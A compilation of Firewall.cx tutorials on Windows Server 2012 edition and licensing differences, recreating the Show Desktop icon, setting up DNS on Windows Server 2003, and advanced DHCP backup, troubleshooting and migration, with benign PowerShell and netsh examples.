ReFS is Microsoft’s latest file system, capable of replacing the well-known NTFS file system. The main advantage of ReFS is automatic error correction (a verify and auto-correct process) regardless of the underlying hardware. ReFS uses checksums to detect and correct errors. The ReFS file system has the ability to support a maximum file size of 16 Exabytes (16.7 million TBytes!) and a maximum volume size of 1 Yottabyte (1.1 trillion TBytes).

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Summary

Undoubtedly Windows Server 2012 is packed with new features and additions, designed to help organizations take advantage of cost-optimizing features like Hyper-V, Storage Spaces, PowerShell 3.0, Data Deduplication, SMB 3.0, the new Server Manager and others. Microsoft has also simplified the licensing schemes and introduced four editions of Server 2012: Foundation, Essentials, Standard and Datacenter. Follow this link to read our article covering Windows 2012 Server editions and licensing requirements.

 


Windows 2012 Server Foundation, Essential, Standard & Datacenter Edition Differences, Licensing & Supported Features.

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Windows Server 2012 Editions

windows-2012

On the 1st of August 2012, Microsoft released Windows Server 2012, the sixth release of the Windows Server product family. On May 21st 2013, Windows Server 2012 R2 was introduced and is now the latest version of Windows Server on the market. Microsoft has released four different editions of Windows Server 2012, varying in cost, licensing and features. These four editions of Windows Server 2012 R2 are: the Foundation edition, the Essentials edition, the Standard edition and the Datacenter edition.

Let’s take a closer look at each Windows Server 2012 edition and what they have to offer.

Users can also download the free Windows Server 2012 R2 Licensing Datasheet in our Windows Server Datasheets & Useful Resources download section, which provides a detailed overview of the licensing for Windows Server 2012 and contains extremely useful information on the various Windows Server 2012 editions, examples on how to calculate your licensing needs, the virtualization instances supported by every edition, server roles, common questions & answers, plus much more.

More technical articles covering Windows 2012 Server and Hyper-V Virtualization are available in our Windows 2012 Server section.

Windows Server 2012 Foundation Edition

This edition of Windows Server 2012 is targeted towards small businesses of up to 15 users. The Windows Server 2012 R2 Foundation edition comes pre-installed on a hardware server with a single physical processor and up to 32GB of RAM. The Foundation edition can be implemented in environments where features such as file sharing, printer sharing, security and remote access are required. Advanced server features such as Hyper-V, RODC (Read-Only Domain Controller), data deduplication, dynamic memory, IPAM (IP Address Management), Server Core, the certificate services role, hot-add memory, Windows Server Update Services and failover clustering are not available in the Foundation edition.

Windows Server 2012 Essentials Edition

The Windows Server 2012 R2 Essentials edition is the next step up, also geared towards small businesses of up to 25 users. Windows Server 2012 R2 Essentials edition is available in retail stores around the world, making it easy for businesses to install the new operating system without necessarily purchasing new hardware. Similar to the Foundation edition, the Essentials edition does not support many advanced server features; however, it does provide support for features like Hyper-V, dynamic memory and hot add/remove RAM.

Windows Server 2012 R2 Essentials edition can run a single instance of virtual machine on Hyper V, a feature that was not available in Windows Server 2012 Essentials (non-R2) edition. This single virtual machine instance can be Windows Server 2012 R2 Essential edition only, seriously limiting the virtualization options but allowing companies to begin exploring the benefits of the virtualization platform.

Windows Server 2012 Standard Edition

The Windows Server 2012 R2 Standard edition is aimed at medium to large businesses that require additional features not present in the Foundation and Essentials editions. The Standard edition can support an unlimited number of users, as long as the required user licenses have been purchased.

Advanced features such as certificate services role, Hyper V, RODC (Read Only Domain Controller), IPAM (IP Address Management), Data deduplication, server core, failover clustering and more, are available to Windows Server 2012 Standard edition. We should note that the Standard edition supports up to 2 Virtual Machines.

Windows Server 2012 Datacenter Edition

The Windows Server 2012 R2 Datacenter edition is the flagship product created to meet the needs of medium to large enterprises. The major difference between the Standard and Datacenter edition is that the Datacenter edition allows the creation of unlimited Virtual Machines and is therefore suitable for environments with extensive use of virtualization technology.

Before purchasing the Windows Server 2012 operating system, it is very important to understand the differences between the various editions. The table below compares the four editions of Windows Server 2012:

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Feature | Foundation | Essentials | Standard | Datacenter

Distribution | OEM only | Retail, volume licensing, OEM | Retail, volume licensing, OEM | Volume licensing and OEM

Licensing Model | Per server | Per server | Per CPU pair + CAL/DAL | Per CPU pair + CAL/DAL

Processor Chip Limit | 1 | 2 | 64 | 64

Memory Limit | 32GB | 64GB | 4TB | 4TB

User Limit | 15 | 25 | Unlimited | Unlimited

File Services Limits | 1 standalone DFS root | 1 standalone DFS root | Unlimited | Unlimited

Network Policy & Access Services Limits | 50 RRAS connections and 10 IAS connections | 250 RRAS connections, 50 IAS connections, and 2 IAS Server Groups | Unlimited | Unlimited

Remote Desktop Services Limits | 50 Remote Desktop Services connections | Gateway only | Unlimited | Unlimited

Virtualization Rights | n/a | Either in 1 VM or 1 physical server, but not both at once | 2 VMs | Unlimited

DHCP, DNS, Fax Server, Printing & IIS Services | Yes | Yes | Yes | Yes

Windows Server Update Services | No | Yes | Yes | Yes

Active Directory Services | Yes (must be root of forest and domain) | Yes (must be root of forest and domain) | Yes | Yes

Active Directory Certificate Services | Certificate Authorities only | Certificate Authorities only | Yes | Yes

Windows PowerShell | Yes | Yes | Yes | Yes

Server Core Mode | No | No | Yes | Yes

Hyper-V | No | No | Yes | Yes

Windows Server 2012 Licensing - Understanding Client Access License (CAL) & Device Access License (DAL) Licensing Models

The Standard and Datacenter editions of Server 2012 support the Client Access License (CAL) and Device Access License (DAL) licensing models. A CAL is assigned to a user, whereas a DAL is assigned to a device (computer). For example, a CAL assigned to a user allows only that user to access the server, from any device. Likewise, if a DAL is assigned to a particular device, then any authenticated user using that device is allowed to access the server.

We can use a simple example to help highlight the practical differences between CAL and DAL licensing models and understand the most cost-effective approach:

Assume an environment with Windows Server 2012 R2 Standard edition and a total of 50 users and 25 devices (workstations). In this case, we can purchase either 50 CALs to cover our 50 users or, alternatively, 25 DALs to cover the total number of workstations that need to access the server. In this scenario, purchasing DALs is the more cost-effective solution.

If, however, we had 10 users with a total of 20 devices, e.g. 2 devices per user (workstation & laptop), then it would be more cost-effective to purchase 10 CALs.
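
The decision comes down to simple arithmetic: buy whichever of the two counts (users or devices) is smaller, assuming both license types cost roughly the same. The PowerShell sketch below illustrates the comparison; the per-license prices are hypothetical placeholders, not Microsoft list prices.

    # Minimal sketch: compare User CALs against Device DALs for a given environment.
    # $calPrice and $dalPrice are placeholder figures - substitute real quotes.
    $users    = 50
    $devices  = 25
    $calPrice = 30        # hypothetical cost per CAL
    $dalPrice = 30        # hypothetical cost per DAL

    $calTotal = $users   * $calPrice
    $dalTotal = $devices * $dalPrice

    if ($dalTotal -lt $calTotal) {
        "Buy $devices DALs (total $dalTotal) instead of $users CALs (total $calTotal)."
    } else {
        "Buy $users CALs (total $calTotal) instead of $devices DALs (total $dalTotal)."
    }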

Windows Server 2012 Foundation Edition Licensing Model

Windows Server 2012 Foundation is available to OEMs (Original Equipment Manufacturers) only and can therefore only be purchased at the time of purchasing a new hardware server. The Windows 2012 Foundation edition supports up to 15 users, and CALs or DALs are not required for Foundation edition servers. In addition, Foundation edition owners cannot upgrade to other editions. The maximum number of SMB (Server Message Block, or file sharing) connections to the server is 30, while the maximum number of RRAS (Routing and Remote Access Service) and RDS (Remote Desktop Services) connections is 50.

Windows Server 2012 Essentials Edition Licensing Model

The Essentials edition of Server 2012 is available to OEMs (with the purchase of new hardware) and also at retail stores. The user limit of this edition is 25 and the device limit is 50. This means that a maximum of 25 users across 50 computers can access the Windows Server 2012 Essentials edition. For example, you could have 20 users rotating randomly among 25 computers, all accessing the Server 2012 Essentials edition without any problem. CALs or DALs are not required for Windows Server 2012 Essentials edition because no more than 25 users can access the server.

A common question at this point is: what happens if the organization expands and increases its users and computers?

In these cases Microsoft provides an upgrade path, allowing organizations to purchase a Windows Server 2012 Standard or Datacenter edition license and perform an in-place license transition. Once the transition is complete, the user limitation is lifted and the additional features are unlocked without requiring migration or reinstallation of the server.

Companies upgrading to a higher edition of Windows 2012 Server should keep in mind that it will be necessary to purchase the required amount of CALs or DALs according to their users or devices.

Administrators will be happy to know that it is also possible to downgrade the Standard edition of Server 2012 to the Essentials edition. For example, it is possible to run the Essentials edition of Server 2012 as a virtual machine, utilizing one of the two virtual instances available with a Standard edition license. This eliminates the need to purchase a separate Essentials edition license.


With the release of Windows Server 2012 R2 Essentials, Microsoft updated its licensing model. Unlike Windows Server 2012 Essentials (non-R2), you can now run a single virtual machine instance.

The Hyper-V role and Hyper-V Manager console are now included with Windows Server 2012 R2 Essentials. The server licensing rights have been expanded, allowing you to install an instance of Essentials on your physical server to run the Hyper-V role (with none of the other roles and features of the Essentials Experience installed), and a second instance of Essentials as a virtual machine (VM) on that same server with all the Essentials Experience roles and features.

Windows Server 2012 Standard Edition & Datacenter Edition Licensing Model

Licensing of the Standard and Datacenter editions is based on sockets (CPUs) plus CALs or DALs. A socket is a physical processor; logical cores are not counted as sockets. A single Standard or Datacenter license covers up to two physical processors on a single physical server. CAL or DAL licenses are then required so that clients/devices can access the Windows server. The Standard edition allows up to two virtual instances per license, while the Datacenter edition allows an unlimited number of virtual instances.

For example, Windows Server 2012 R2 Standard edition installed on a physical server with one socket (CPU) can support up to two virtual machine instances. These virtual machines can run the Server 2012 R2 Standard or Essentials edition. Similarly, if you install the Windows Server 2012 R2 Datacenter edition, you can run an unlimited number of virtual machines.

Let’s look at some examples on deploying Standard and Datacenter edition servers and calculating the licenses required:

Scenario 1: Install Server 2012 Standard/Datacenter Edition on a server box with four physical processors and 80 users.

In this scenario, we will be required to purchase two Standard/Datacenter Edition licenses because a single license covers up to two physical processors, plus 80 CAL licenses so our users can access the server resources.

Scenario 2: Install Server 2012 Standard Edition on a physical server with 1 physical processor, running 8 instances of virtual machines. A total of 50 users will be accessing the server.

Here, four Server 2012 Standard edition licenses are required and 50 CALs or DALs. Remember that a single Standard edition license covers up to two physical processors and up to two instances of virtual machines. Since the requirement is to run 8 instances of virtual machines, we need four Standard edition licenses.

If we decided to use the Datacenter edition in this scenario, a single license with 50 CAL would be enough to cover our needs, because the Datacenter edition license supports an unlimited number of virtual instances and up to two physical processors.
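
The Standard edition rule of thumb can be expressed as a small calculation: one license covers up to two physical processors and up to two virtual machine instances on the same host, so you need enough licenses to satisfy whichever requirement is larger. The hypothetical PowerShell helper below sketches this logic; it is a simplification for illustration only.

    # Hypothetical helper: Standard edition licenses needed for one host.
    # Each license covers up to 2 physical processors AND up to 2 VM instances.
    function Get-StandardLicenseCount {
        param([int]$PhysicalProcessors, [int]$VirtualMachines)
        $forSockets = [math]::Ceiling($PhysicalProcessors / 2)
        $forVMs     = [math]::Ceiling($VirtualMachines   / 2)
        [math]::Max($forSockets, $forVMs)
    }

    Get-StandardLicenseCount -PhysicalProcessors 4 -VirtualMachines 0   # Scenario 1 -> 2 licenses
    Get-StandardLicenseCount -PhysicalProcessors 1 -VirtualMachines 8   # Scenario 2 -> 4 licenses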

Summary

Microsoft’s Windows Server 2012 is an attractive server-based product designed to meet the demands of small to large enterprises and has a very flexible licensing model. It is very important to fully understand the licensing options and supported features on each of the 4 available editions, before proceeding with your purchase – a tactic that will help ensure costs are kept well within the allocated budget while the company’s needs are fully met.


How to Recover & Create "Show Desktop" Icon Function on Windows 7, Vista, XP and 2000


The Show Desktop feature, included with almost all versions of Windows up to Windows 7, allows a user to minimize or restore all open programs and easily view the desktop. To use this feature, a user simply clicks the Show Desktop icon on the Quick Launch area of the taskbar.

A common problem amongst Windows users is that the Show Desktop icon can accidentally be deleted, thus losing the ability to minimize all open programs and reveal your desktop.

This short article will explain how you can recover and create the Show Desktop icon and restore this functionality. The instructions included are valid for Windows 95, 98, 2000, Windows Vista and Windows 7 operating systems.

To recreate the Show Desktop icon, follow these steps:

1) Click on Start, Run, type Notepad and click on OK or Hit Enter. Alternatively, open the Notepad application.

2) Carefully copy and paste the following text into the Notepad window:

    [Shell]
    Command=2
    IconFile=explorer.exe,3
    [Taskbar]
    Command=ToggleDesktop

On the File menu, click Save As, then save the file to your desktop as Show desktop.scf. The Show Desktop icon is now created on your desktop.

 3) Finally, click and drag the Show Desktop icon to your Quick Launch toolbar.
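
If you prefer not to create the file by hand, the same result can be scripted on systems where Windows PowerShell is available. The sketch below writes the exact contents from step 2; the Quick Launch folder path is the usual default and may differ on customized profiles.

    # Sketch: recreate "Show desktop.scf" without opening Notepad.
    # The lines below are exactly those shown in step 2 above.
    $scfLines = '[Shell]',
                'Command=2',
                'IconFile=explorer.exe,3',
                '[Taskbar]',
                'Command=ToggleDesktop'

    # Write the file to the current user's desktop...
    $desktop = [Environment]::GetFolderPath('Desktop')
    $scfFile = Join-Path $desktop 'Show desktop.scf'
    Set-Content -Path $scfFile -Value $scfLines -Encoding Ascii

    # ...and, optionally, copy it into the Quick Launch folder (default path
    # assumed - adjust it if your profile stores Quick Launch elsewhere).
    $quickLaunch = Join-Path $env:APPDATA 'Microsoft\Internet Explorer\Quick Launch'
    if (Test-Path $quickLaunch) { Copy-Item $scfFile $quickLaunch }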

Windows 2003 DNS Server Installation & Configuration

DNS is used for translating host names to IP addresses and the reverse, for both private and public networks (i.e.: the Internet). DNS does this by using records stored in its database. On the Internet DNS mainly stores records for public domain names and servers whereas in private networks it may store records for client computers, network servers and data pertaining to Active Directory.

In this article, we will install and configure DNS on a standalone Windows Server 2003. We will begin by setting up a cache-only DNS server and progress to creating a primary forward lookup zone, a reverse lookup zone, and finally some resource records. At the end of this article we will have set up a DNS server capable of resolving internal and external host names to IP addresses and the reverse.

Install DNS on Windows Server 2003

Before installing and configuring DNS on our server we have to perform some preliminary tasks. Specifically, we have to configure the server with a static IP address and a DNS suffix. The suffix will be used to fully-qualify the server name. To begin:

1. Go to Start > Control Panel > Network Connections , right-click Local Area Connection and choose Properties .

2. When the Local Area Connection Properties window comes up, select Internet Protocol (TCP/IP) and click Properties . When the Internet Protocol (TCP/IP) window comes up, enter an IP address , subnet mask and default gateway IP addresses that are all compatible with your LAN.

Our LAN is on a 192.168.1.0/24 network, so our settings are as follows:

tk-windows-dns-p1-1

3. For the Preferred DNS Server , enter the loopback address 127.0.0.1 . This tells the server to use its own DNS server service for name resolution, rather than using a separate server. After filling out those fields , click the Advanced button.

4. When the Advanced TCP/IP Settings window comes up, click the DNS tab, enter firewall.test on the DNS suffix for this connection text field, check Register this connection's address in DNS , check Use this connection's DNS suffix in DNS registration , and click OK , OK , and then Close:

tk-windows-dns-p1-2

 

Now that we have configured our server with a static IP address and a DNS suffix, we are ready to install our DNS Server. To do this:

1. Go to Start > Control Panel > Add or Remove Programs .

2. When the Add or Remove Program window launches, click Add/Remove Windows Components on the left pane.

3. When the Windows Components Wizard comes up, scroll down and highlight Networking Services and then click the Details button.

4. When the Networking Services window appears, place a check mark next to Domain Name System (DNS) and click OK and OK again.

 

tk-windows-dns-p1-3

Note that, during the install, Windows may generate an error claiming that it could not find a file needed for DNS installation. If this happens, insert your Windows Server 2003 CD into the server's CD-ROM drive and browse to the i386 directory. The wizard should automatically find the file and allow you to select it. After that, the wizard should resume the install.

After this, DNS should be successfully installed. To launch the DNS MMC, go to Start > Administrative Tools > DNS

tk-windows-dns-p1-4

As our DNS server was just installed it is not populated with anything. On the left pane of the DNS MMC, there is a server node with three nodes below it, titled Forward Lookup Zones, Reverse Lookup Zones and Event Viewer.

The Forward Lookup Zones node stores zones that are used to map host names to IP addresses, whereas the Reverse Lookup Zones node stores zones that are used to map IP addresses to host names.

Setting Up a Cache-Only DNS Server

A cache-only DNS server contains no zones or resource records. Its only function is to cache answers to queries that it processes, that way if the server receives the same query again later, rather than go through the recursion process again to answer the query, the cache-only DNS server would just return the cached response, thereby saving time. With that said, our newly installed DNS server is already a cache-only DNS server!

Creating a Primary Forward Lookup Zone

With its limited functionality, a cache-only DNS server is best suited for a small office environment or a small remote branch office. However, in a large enterprise where Active Directory is typically deployed, more features would be needed from a DNS server, such as the ability to store records for computers, servers and Active Directory. The DNS server stores those records in a database, or a zone .

DNS has a few different types of zones, and each has a different function. We will first create a primary forward lookup zone titled firewall.test . We do not want to name it firewall.cx , or any variation that uses a valid top-level domain name, as this would potentially disrupt the clients' abilities to access the real websites for those domains.

1. On the DNS MMC, right-click the Forward Lookup Zones node and choose New Zone .

2. When the New Zone Wizard comes up, click Next .

3. On the Zone Type screen, make sure that Primary zone is selected and click Next .

4. On the Zone Name screen, type firewall.test .

5. On the Zone File screen, click Next .

6. On the Dynamic Update screen, make sure that “ Do not allow dynamic updates ” is selected and click Next .

7. On the next screen, click Finish .

We now have a foundation that we can place resource records in for name resolution by internal clients.

Creating a Primary Reverse Lookup Zone

Contrary to the forward lookup zone, a reverse lookup zone is used by the DNS server to resolve IP addresses to host names. Not as frequently used as forward lookup zones, reverse lookup zones are often used by anti-spam systems in countering spam and by monitoring systems when logging events or issues. To create a reverse lookup zone:

1. On the DNS MMC, right-click the Reverse Lookup Zones node and choose New Zone .

2. When the New Zone Wizard comes up, click Next .

3. On the Zone Type screen, make sure that Primary zone is selected and click Next .

4. On the Reverse Lookup Zone Name screen, enter 192.168.1 and click Next .

5. On the Zone File screen, click Next .

6. On the Dynamic Update screen, make sure that “Do not allow dynamic updates” is selected and click Next .

7. On the next screen, click Finish .

tk-windows-dns-p1-5

There is now a reverse lookup zone titled 192.168.1.x Subnet on the left pane of the DNS MMC. This will be used to store PTR records for computers and servers in that subnet.

Using the instructions above, go ahead and create two additional reverse lookup zones: one for the 192.168.2.x subnet and one for the 192.168.3.x subnet.
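
For reference, the same zones can also be created from the command line. The sketch below uses the DnsServer PowerShell module that ships with Windows Server 2012 and later, so it does not apply to Server 2003 itself (where the MMC steps above, or the dnscmd.exe tool from the Support Tools, are the options); the zone file names follow the wizard's defaults.

    # Sketch (Windows Server 2012+ DnsServer module): create the same
    # forward and reverse lookup zones built by the New Zone Wizard above.
    Add-DnsServerPrimaryZone -Name 'firewall.test' -ZoneFile 'firewall.test.dns' -DynamicUpdate None

    Add-DnsServerPrimaryZone -NetworkId '192.168.1.0/24' -ZoneFile '1.168.192.in-addr.arpa.dns' -DynamicUpdate None
    Add-DnsServerPrimaryZone -NetworkId '192.168.2.0/24' -ZoneFile '2.168.192.in-addr.arpa.dns' -DynamicUpdate None
    Add-DnsServerPrimaryZone -NetworkId '192.168.3.0/24' -ZoneFile '3.168.192.in-addr.arpa.dns' -DynamicUpdate None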

Creating Resource Records

DNS uses resource records (RRs) to tie host names to IP addresses and the reverse. There are different types of resource records, and the DNS server will respond with the record that is requested in a query.

The most common resource records are: Host (A); Mail Exchanger (MX); Alias (CNAME); and Service Location (SRV) for Active Directory zones. As such, we will create all but SRV records because Active Directory will create those automatically:

1. On the DNS MMC, expand the Forward Lookup Zones node followed by the firewall.test zone.

2. Right-click firewall.test zone and choose Other New Records .

3. On the Resource Record Type window, select Host (A) and click Create Record

4. On the New Resource Record window, type “ webserver001 ” on the Host text field, type “ 192.168.2.200” in the IP address text field, check the box next to “Create associated pointer (PTR) record” and click OK .

This tells DNS to create a PTR record in the appropriate reverse lookup zone. And, for demonstration purposes, it does not matter whether this server actually exists or not.

5. Back at the Resource Record Type window, select Host (A) again and click Create Record .

6. On the New Resource Record window, type “ mailserver001 ” on the Host text field and type “ 192.168.3.200” in the IP address text field. Make sure that the check box next to “Create associated pointer (PTR) record” is checked and click OK . A corresponding PTR record will be created in the appropriate reverse lookup zone.

7. Back at the Resource Record Type window, select Alias (CNAME) and click Create Record .

8. On the New Resource Record window, type “ www ” on the Alias name text field, then click Browse .

9. On the Browse window, double-click the server name, then double-click Forward Lookup Zones, then double-click firewall.test , and finally double-click webserver001 . This should populate the webserver001's fully qualified domain name in the Fully qualified domain name (FQDN) for target host text field. Click OK afterwards.

10. Back at the Resource Record Type window, select Mail Exchanger (MX) and click Create Record .

11. On the New Resource Record window, click Browse , double-click the server name, then double-click Forward Lookup Zones, then double-click firewall.test, and finally double-click mailserver001 . This should populate the mailserver001's fully qualified domain name in the Fully qualified domain name (FQDN) of mail server text field. Click OK afterwards.

12. Back at the Resource Record Type window, click Done .
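
The records created in the steps above can also be scripted. Again, this is a sketch using the DnsServer PowerShell module from Windows Server 2012 and later rather than Server 2003's own tooling; the MX preference of 10 is an arbitrary but typical value.

    # Sketch (Windows Server 2012+ DnsServer module): A, CNAME and MX records
    # equivalent to those created through the MMC above.
    Add-DnsServerResourceRecordA     -ZoneName 'firewall.test' -Name 'webserver001'  -IPv4Address '192.168.2.200' -CreatePtr
    Add-DnsServerResourceRecordA     -ZoneName 'firewall.test' -Name 'mailserver001' -IPv4Address '192.168.3.200' -CreatePtr
    Add-DnsServerResourceRecordCName -ZoneName 'firewall.test' -Name 'www' -HostNameAlias 'webserver001.firewall.test'
    Add-DnsServerResourceRecordMX    -ZoneName 'firewall.test' -Name '.'   -MailExchange 'mailserver001.firewall.test' -Preference 10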

Summary

Our standalone Windows Server 2003 DNS server now has a primary forward lookup zone, a primary reverse lookup zone, and multiple resource records. As a standard function, it will also cache the answers to queries that it has already resolved.


Windows 2003 DHCP Server Advanced Configuration - Part 2

Part 1 of our Windows 2003 DHCP Server Advanced Configuration article explained the creation and configuration of DHCP Scope options and how to configure various DHCP server settings. This article focuses on backing up and restoring the DHCP server database, troubleshooting DHCP using a packet analyser and more.

Backing up the DHCP database

Our DHCP server is fully functional but it may not always remain that way. We definitely want to back it up so we can quickly restore the functionality in the event of a disaster.

The DHCP scopes, settings and configuration are actually kept in a database file, and the database is automatically backed up every 60 minutes. But to manually back it up:

  • On the DHCP MMC, right-click the server node and choose Backup
  • When the Browse for Folder window comes up, verify that it points to C:\windows\system32\dhcp\backup and click OK:

tk-windows-dhcp-2k3-advanced-12

Restoring the DHCP Database

Let us imagine that a disaster with the DHCP server did occur and that we now have to restore the DHCP functionality. Restoring the DHCP database is just as simple as backing it up:

  1. On the DHCP MMC, right-click the server node and choose Restore
  2. When the Browse for Folder window comes up, click OK
  3. You will receive a prompt informing you that the DHCP service will need to be stopped and restarted for the restore to take place. Click OK

The DHCP database will then be restored.

Troubleshooting DHCP

Let us imagine that, after restoring the database, the DHCP server developed some issues and started malfunctioning. Luckily, DHCP comes equipped with several tools to help us troubleshoot.

Event Viewer

The Event Viewer displays events that the server has reported and whether those events represent actual issues or normal operation. Most of the issue events related to DHCP will be reported in the System log of the Event Viewer with a Source of DHCPServer.

To view the Event Viewer:

  1. Go to Start > Administrative Tools > Event Viewer
  2. When the Event Viewer window comes up, click the System log on the left pane and its events will be displayed on the right pane.

Depending on how active the server is, the System log may be cluttered with Information, Warning and Error events that are unrelated to DHCP. To see only DHCP issues, filtering non-important events is necessary. To do this:

  1. Go to the View > Filter
  2. When the System Properties window comes up, click on the Event Source drop-down menu and select DHCPServer . This tells the log to display only DHCP server events.
  3. Next, uncheck the box next to Information . This tells the log to display only events regarding issues.
  4. (Optional) On the From and To drop-down menus on the bottom, adjust the time and date frame to when an issue was suspected to have occurred.
  5. When finished, click OK

The System log is now displaying only DHCP Warning and Error events. This should cause any DHCP-related issues to stick out:

tk-windows-dhcp-2k3-advanced-13

Every event has an Event ID. In case a particular event's description is too vague to understand, you may have to research the Event ID for further clarification.

DHCP Audit Logs

Another DHCP troubleshooting tool is the DHCP audit logs. These logs display detailed information about what the DHCP server has been doing. If a client leases an IP address, renews its IP address, or releases its IP address, the DHCP server will audit this activity.

More concerning events are also audited: if the DHCP server service stops, encounters a rogue DHCP server in the network, or fails to start, the server will audit this issue as well. These logs provide closer visibility into what the DHCP server is doing.

To access the DHCP audit logs:

  1. Go to Start > Run
  2. When the Run box comes up, type c:\windows\system32 and click OK
  3. When the System32 folder comes up, navigate to and double-click the dhcp folder.

In the dhcp folder, the log files are titled DhcpSrvLog-%WeekDay%.log, where %WeekDay% is an abbreviated day of the week (for example, DhcpSrvLog-Mon.log). There should be one for each day of the past week.

tk-windows-dhcp-2k3-advanced-14

The log may appear overwhelming, but it is very simple to read. Each line contains several pieces of information but the most important is the code at the beginning of the line, since that describes what is being audited. That code is defined on the top portion of the log file. As each line is comma-separated you can actually save the log file in .csv format and open it in Excel for easier and more convenient reading and analysis.
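
Instead of round-tripping through Excel, the log can also be parsed directly with PowerShell. The sketch below assumes the usual layout of the audit log: a legend at the top followed by a column-header line beginning with "ID,"; adjust the column names if your log differs.

    # Sketch: parse a DHCP audit log as CSV with PowerShell.
    $logFile = 'C:\Windows\System32\dhcp\DhcpSrvLog-Mon.log'   # pick the day you need
    $lines   = Get-Content $logFile

    # Skip the legend; the comma-separated data starts at the header line ("ID,Date,Time,...").
    $headerIndex = 0
    while ($headerIndex -lt $lines.Count -and $lines[$headerIndex] -notmatch '^ID,') { $headerIndex++ }

    $events = $lines[$headerIndex..($lines.Count - 1)] | ConvertFrom-Csv
    $events | Format-Table ID, Date, Time, Description -AutoSize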

Protocol Analyzer

Although a Network protocol analyzer is not an official DHCP troubleshooting tool, it is nonetheless an excellent tool for troubleshooting issues where the server is not servicing clients. In such situations you would use the protocol analyzer on the server to determine whether DHCP Discover/Request packets from clients are arriving at the server at all or if they are arriving but being ignored by the server.

If you find that the packets are not arriving at the server at all, you would have isolated the problem to most likely being a routing issue or an issue with any relay agents/configured IP helpers in the network.

However, if you find that the packets are arriving but being ignored by the server, then you would have isolated the problem to either residing on the server or the configuration of DHCP.

The screen shot below, of Wireshark, shows that the server received a DHCP Discover packet from a client and properly responded to it.

tk-windows-dhcp-2k3-advanced-15

DHCP Migration

Continuing from our previous storyline, let us pretend that we found the issue affecting our DHCP server, but that fixing it would require taking the DHCP server offline for a considerable amount of time. For the time being, we will simply set up a different server as our DHCP server.

To accomplish this, we will have to transfer the DHCP database to our new server. Migrating the DHCP database is not only done in situations such as this. When a DHCP server is decommissioned, for example, you would need to transfer the DHCP database to the new server.

Although the transfer can technically be done in more than one way, presented below is one method. Regardless of the approach chosen, you should aim to minimize the amount of time that both DHCP servers are simultaneously active and able to service clients as this would increase the chances of one server leasing an IP address that is already in use.

  1. On the old server, go to Start > Run , type cmd , and click OK .
  2. When the Command Prompt window comes up, type netsh dhcp server export c:\dhcp_backup.txt all and hit Enter. This command exports all the scopes in the DHCP database to a file titled dhcp_backup.txt .
  3. Copy the export file ( dhcp_backup.txt ) to the new server.
  4. On the new server, install the DHCP server role. Do not authorize the DHCP server yet.
  5. On the new server, go to Start > Run , type cmd , and click OK .
  6. When the Command Prompt window comes up, type netsh dhcp server import c:\dhcp_backup.txt all and hit Enter. This command imports all the scopes in the DHCP database from the file titled dhcp_backup.txt .
  7. On the new server, enable conflict detection so IP addresses that have been leased out by the old server since the start of the migration are not reissued.

a. On the DHCP MMC, right-click the server node and choose Properties

b. When the Properties window comes up, click the Advanced tab.

c. On Conflict Detection Attempts , increase the number to 2 just to be safe. This tells the server to ping an IP address before it assigns it. If there is a response, then the DHCP server will not lease out the IP address since that address would already be assigned.

d. Click OK

8. On the new server, authorize the DHCP server.

9. On the old server, unauthorize the DHCP server.

Although we could perform a migration by simply backing up the DHCP database on the old server using the backup procedure and restoring it on the new server using the restore procedure, this approach also restores the old DHCP server's configuration settings, such as audit settings, conflict detection settings, DDNS settings, etc. It may not always be desirable to transfer those settings in a migration. The procedure described above only transfers the scopes and their settings.
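
As a side note, on Windows Server 2012 and later the netsh export/import pair used above has a PowerShell equivalent that can also carry active leases across; a minimal sketch follows. It does not apply to Server 2003 itself.

    # Sketch (Windows Server 2012+): migrate the DHCP configuration with PowerShell.
    # On the old server:
    Export-DhcpServer -File 'C:\dhcp_backup.xml' -Leases

    # On the new server (after copying the file across):
    Import-DhcpServer -File 'C:\dhcp_backup.xml' -BackupPath 'C:\dhcp_premigration_backup' -Leases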

Conclusion

Without careful observation, the full capabilities of DHCP can be overlooked. The protocol, in combination with the DHCP MMC, provides numerous methods to control client configuration settings and server administrative functions.


Windows 2003 DHCP Server Advanced Configuration - Part 1

In this article, we will cover more advanced DHCP features and topics such as server options, superscopes, multicast scopes, dynamic DNS, DHCP database backup and restoration, DHCP migration, and DHCP troubleshooting. We will cover these topics in two ways: by building out from our earlier implementation and by using our imagination!

Ok, using our imagination for this purpose may seem silly but doing so will give us the opportunity to indirectly learn how, why, and where these advanced DHCP features and topics come into play in a real-world network and how other networking technologies are involved in a DHCP implementation.

We will imagine that we are building our DHCP server for a company that has two buildings, Building A and Building B, each with a single floor (for now). Building A is on a 192.168.0.0/24 network and Building B is on a 192.168.1.0/24 network.

Although each building has its own DNS server (192.168.0.252 and 192.168.1.252), WINS server (192.168.0.251 and 192.168.1.251) and Cisco Catalyst 4507R-E switch (192.168.0.254 and 192.168.1.254), only a single DHCP server exists – it is the one that we have been building and it resides in Building A.

The clients and servers in each building connect to their respective Cisco Catalyst switches and the switches are uplinked to a Cisco router for Internet connectivity. The only notable configuration is with the Building B switch: It is configured with the ip helper-address 192.168.0.253 command.

The ip helper-address command tells the switch to forward DHCP requests in the local subnet to the DHCP server, since the clients in Building B cannot initially communicate with the DHCP server directly. We are not concerned with any other configuration or networking technologies for now.

Server Options

The specifications of our imaginary company state that the company has two buildings – Building A and Building B. In our first article, we created a scope called “Building A, Floor 1” so a scope for our first building is already made. In this article, we will create a scope for Building B, Floor 1, using the instructions from our Basic DHCP Configuration article and the following specifications for the scope:

tk-windows-dhcp-2k3-advanced-1

After creating the scope, we want to activate it as well.

Notice that, in creating this scope, we had to input a lot of the same information from our “Building A, Floor 1” scope. In the event that we had several other scopes to create, we would surely not want to be inputting the same information each time for each scope.

That is where server options are useful. Server options allow you to specify options that all the scopes have in common. In creating two scopes, we noticed that our scopes had the following in common:

  • DNS servers
  • WINS servers
  • Domain name

To avoid having to enter this information again, we will create these options as server options. To do this:

1. On the DHCP MMC, right-click Server Options and choose Configure Options

tk-windows-dhcp-2k3-advanced-2

When the Server Options window comes up, take a moment to scroll down through the long list of available options. Not all options are needed or used in every environment. In some cases, however, a needed option is not available. For example, Cisco IP phones require Option 150 but because that option is not available it would have to be defined manually. Other than that, options 006 DNS Servers, 015 DNS Domain, and 003 Router are generally sufficient.

